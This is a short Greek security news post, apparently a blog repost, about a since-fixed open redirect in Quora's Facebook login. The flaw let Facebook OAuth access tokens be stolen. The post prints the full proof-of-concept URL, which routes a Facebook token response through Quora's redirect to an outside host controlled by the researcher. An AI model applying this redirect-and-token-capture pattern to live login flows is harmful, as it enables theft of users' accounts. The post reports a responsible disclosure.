O Iνδός ερευνητής ασφάλειας Prakhar Prasad ανακάλυψε μια ευπάθεια ανοιχτής ανακατεύθυνσης (Open Redirect) στο Quora, η οποία επιτρέπει την παραβίαση λογαριασμών του Facebook. Το Quora είναι μια social υπηρεσία με σκοπό την ανταλλαγή γνώσεων, όπου οι χρήστες δημιουργούν ερωτήσεις και λαμβάνουν απαντήσεις από την κοινότητα.Το Quora επιτρέπει στους χρήστες να εγγραφούν στην υπηρεσία, μέσω του λογαριασμού τους στο Facebook. Κατά την εγγραφή ο ερευνητής παρατήρησε ότι η ιστοσελίδα είχε το δικαίωμα να λάβει το διακριτικό πρόσβασης (access token) από το OAuth του facebook, το οποίο και υπέκλεψε αξιοποιώντας ευπάθεια ανοικτής ανακατεύθυνσης. Με την χρήση του access token, ο ερευνητής μπορούσε να αποκτήσει πρόσβαση καθώς και τα πλήρη δικαιώματα σε οποιοδήποτε λογαριασμό του Facebook.
Ο κώδικας POC της ευπάθειας:
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token
Demo video:
Ο ερευνητής ενημέρωσε το Quora για την ευπάθεια, η οποία επιδιορθώθηκε άμεσα.
Πηγή : www.secnews.gr
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου